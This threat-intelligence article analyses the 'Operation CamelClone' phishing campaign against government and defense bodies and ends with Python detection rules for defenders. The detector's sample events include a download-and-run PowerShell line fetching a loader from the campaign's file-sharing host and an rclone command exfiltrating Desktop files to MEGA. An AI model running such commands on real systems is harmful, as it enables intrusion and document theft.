A sophisticated cyber espionage campaign, dubbed Operation CamelClone, has been actively targeting government agencies, defense institutions, and diplomatic bodies across multiple nations, including Algeria, Mongolia, Ukraine, and Kuwait. This operation utilizes spear-phishing emails containing malicious ZIP archives, which are designed to resemble official government correspondence. When the archive contents are opened, they trigger a multi-stage infection chain that ultimately facilitates data theft, employing a legitimate cloud transfer tool.
The initial detection of Operation CamelClone occurred in late February 2026, when a suspicious ZIP file, named after Algeria’s Ministry of Housing, Urban Development, and the City, was uploaded to VirusTotal from Algeria. Shortly thereafter, a second sample surfaced, targeting Mongolia with a theme of “Expanding cooperation with China.” As March progressed, two more samples emerged, one referencing Algerian-Ukrainian cooperation proposals and another targeting Kuwait’s Air Force with a decoy related to defense procurement. These findings confirmed the campaign’s broad geographical reach and its focus on sensitive governmental and defense sectors.
Operation CamelClone: Geopolitical Targets and Sophisticated Tactics
Analysis by Seqrite analysts revealed that while the targeted countries may appear geographically disparate, each holds a significant position within the current global geopolitical landscape. Ukraine remains at the focal point of an ongoing armed conflict. Algeria plays a crucial role in European and African energy politics. Mongolia is navigating complex relationships between China, Russia, and Western partners. Kuwait is a strategic defense partner in the Gulf region. This strategic selection of targets suggests an intelligence-gathering motive rather than financial gain.
The attack vector employed by Operation CamelClone has remained consistent across all observed samples. Each malicious ZIP archive contains a Windows shortcut (LNK) file. This shortcut is accompanied by a convincing decoy image, often displaying an official government logo, such as the Algerian Ministry’s seal, Mongolia’s MonAtom LLC emblem, or the Kuwait Armed Forces crest. The attackers strategically use these recognizable emblems to lend an air of authenticity to the phishing attempts.
Once a victim opens the shortcut file, a hidden PowerShell command is executed silently in the background. This command initiates the download of the subsequent stages of the attack from an anonymous public file-sharing platform. A key aspect of this operation that makes detection challenging is the complete absence of dedicated command-and-control servers.
Abuse of Public File-Sharing and Cloud Storage in CamelClone
Instead of relying on traditional command-and-control infrastructure, Operation CamelClone leverages public file-sharing sites for hosting all its malicious payloads. Specifically, the attackers are utilizing filebulldogs[.]com for this purpose. Furthermore, stolen data is routed through MEGA, a legitimate cloud storage service, for exfiltration. This method effectively blends malicious network traffic with ordinary internet activity, significantly complicating detection efforts by standard network monitoring tools.
Inside the infection chain, after the shortcut file is executed, a PowerShell command downloads and immediately runs a JavaScript file named “f.js” from filebulldogs[.]com. Seqrite researchers refer to this loader as HOPPINGANT. This Windows Script Host JavaScript executes two Base64-encoded PowerShell commands to carry out further malicious actions. These commands first download a null-padded decoy Portable Document Format (PDF) file, intended to distract the victim. Subsequently, they retrieve a ZIP archive named “a.zip.”
The “a.zip” archive contains a portable copy of Rclone, a legitimate, open-source cloud file transfer tool, specifically version 1.70.3. After extracting and running Rclone, the script decodes a stored password using a simple XOR method with the key value 56. This password is then used to log into a MEGA account that was registered using an anonymous onionmail.org email address. Once the connection to MEGA is established, the Rclone tool systematically searches the victim’s Desktop for files with extensions such as .doc, .docx, .pdf, and .txt. These identified files are then uploaded directly to the attacker’s storage on MEGA.
Additionally, the script targets Telegram session data, specifically from the Telegram Desktop “tdata” directory. This could potentially grant the attackers access to the victim’s private conversations. Across all observed campaigns, four unique MEGA accounts were identified, all of which were reportedly registered in February and March 2026. The consistent use of these methods across multiple targets, as highlighted by the CamelClone campaign, underscores the evolving tactics of cyber adversaries.
Organizations operating in the government, defense, and diplomatic sectors should exercise extreme caution when handling unsolicited ZIP files, particularly those that reference official institutions or defense-related partnerships. Implementing measures such as blocking access to anonymous file-sharing platforms and closely monitoring outbound traffic to cloud storage services like MEGA can significantly limit exposure. Furthermore, restricting the execution of LNK files from untrusted sources and deploying behavior-based endpoint detection solutions can help to halt the PowerShell and JavaScript-based execution chain before it can complete its objectives.
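The execution chain described above (Explorer launching hidden encoded PowerShell, a Windows Script Host loader from a temp directory, WSH spawning further encoded PowerShell, and Rclone copying Desktop documents or Telegram data to a MEGA remote) can be expressed as host-based detection logic. The following Python is an added example, not code from Seqrite or from the campaign; the process-creation events it runs over are constructed in the block in a simplified Sysmon-style shape, and the rule thresholds are assumptions to tune against local telemetry.

```python
import base64
import re

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry:
# (parent image, image, command line). Encoded commands are built here so the sample runs offline.
def _enc(ps):
    return base64.b64encode(ps.encode("utf-16le")).decode()

EVENTS = [
    ("explorer.exe", "powershell.exe", "powershell.exe -w hidden -nop -enc " + _enc(
        "iwr https://filebulldogs.com/f.js -OutFile $env:TEMP\\f.js; wscript $env:TEMP\\f.js")),
    ("powershell.exe", "wscript.exe", "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\f.js"),
    ("wscript.exe", "powershell.exe", "powershell.exe -enc " + _enc("Expand-Archive $env:TEMP\\a.zip")),
    ("powershell.exe", "rclone.exe", "rclone.exe copy C:\\Users\\u\\Desktop mega:in --include *.docx"),
    ("services.exe", "rclone.exe", "rclone.exe sync D:\\data s3:corp-backup"),  # benign admin use
]

FILESHARE = re.compile(r"filebulldogs\.com", re.I)  # loader host named in the report
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def assess_event(parent, image, cmdline):
    """List the CamelClone-style behaviours a single event exhibits (empty list = nothing seen)."""
    hits, low, img, par = [], cmdline.lower(), image.lower(), parent.lower()
    if img == "powershell.exe":
        plain = decode_encoded_command(cmdline) or ""
        if par == "explorer.exe" and "-w hidden" in low and plain:
            hits.append("hidden encoded PowerShell launched from Explorer (LNK-style)")
        if par in ("wscript.exe", "cscript.exe") and plain:
            hits.append("encoded PowerShell spawned by a Windows Script Host loader")
        if FILESHARE.search(plain) or re.search(r"wscript.*\.js", plain, re.I):
            hits.append("download-and-run of a .js loader from a file-sharing host")
    elif img in ("wscript.exe", "cscript.exe") and re.search(r"\\temp\\.*\.js\b", low):
        hits.append("Windows Script Host running .js from a temp directory")
    elif img == "rclone.exe" and re.search(r"\bmega:", low) and re.search(
            r"desktop|tdata|\.docx?\b|\.pdf\b|\.txt\b", low):
        hits.append("Rclone copying documents or Telegram data to a MEGA remote")
    return hits

def triage(events):
    """Map the index of each suspicious event to its behaviours; clean events are omitted."""
    return {i: h for i, (p, im, c) in enumerate(events) if (h := assess_event(p, im, c))}
```

Decoding the -EncodedCommand payload before matching is what lets the file-sharing host rule fire even though the URL never appears in the raw command line; the benign Rclone-to-S3 event shows the MEGA rule does not flag ordinary Rclone use.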